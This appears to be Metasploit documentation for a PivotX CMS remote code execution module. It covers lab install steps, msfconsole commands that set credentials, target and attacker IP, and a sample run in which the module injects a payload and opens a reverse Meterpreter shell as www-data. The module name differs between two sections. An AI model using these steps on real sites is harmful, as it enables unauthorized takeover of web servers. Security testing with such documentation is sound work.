## Vulnerable Application

PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
It's written in PHP and uses MySQL or flat files as a database.

Install steps:

1. Install Apache2, MySQL, PHP8.2+
1. `git clone https://github.com/pivotx/PivotX.git`
1. Move `PivotX` to webfolder
1. Run the following from the web folder `sudo chown -R www-data:www-data ./`

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/pivotx_rce`
1. Do: `set USERNAME [PivotX username]`
1. Do: `set PASSWORD [PivotX password]`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `run`

## Options
### USERNAME

PivotX username.

### PASSWORD

PivotX password.

## Scenarios

```
msf exploit(linux/http/pivotx_index_php_overwrite) > run verbose=true 
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected PivotX 3.0.0.pre.rc3
[*] Logging in PivotX
[*] Modifying file and injecting payload
[*] Triggering payload
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:36104) at 2025-08-01 09:38:52 +0200

[*] Restoring original content

meterpreter > 
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data

```